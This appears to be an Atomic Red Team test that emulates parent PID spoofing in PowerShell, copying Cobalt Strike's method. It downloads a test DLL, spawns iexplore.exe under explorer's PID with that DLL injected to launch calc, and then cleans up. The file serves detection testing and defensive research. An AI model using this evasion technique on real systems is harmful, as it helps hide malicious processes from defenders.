#TechniqueName: Access Token Manipulation: Parent PID Spoofing
#AtomicTestName: Parent PID Spoofing using PowerShell
#Description: This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process.&Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and&calc.exe will be launched.&&Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1)&
#Language: ps1

#get_prereq_commands
New-Item -Type Directory (split-path PathToAtomicsFolder\T1134.004\bin\calc.dll) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "PathToAtomicsFolder\T1134.004\bin\calc.dll"


#commands
. $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
$ppid=Get-Process explorer | select -expand id
PPID-Spoof -ppid $ppid -spawnto "C:\Program Files\Internet Explorer\iexplore.exe" -dllpath "PathToAtomicsFolder\T1134.004\bin\calc.dll"


#cleanup_commands
Stop-Process -Name "calculator" -ErrorAction Ignore
Stop-Process -Name "iexplore" -ErrorAction Ignore

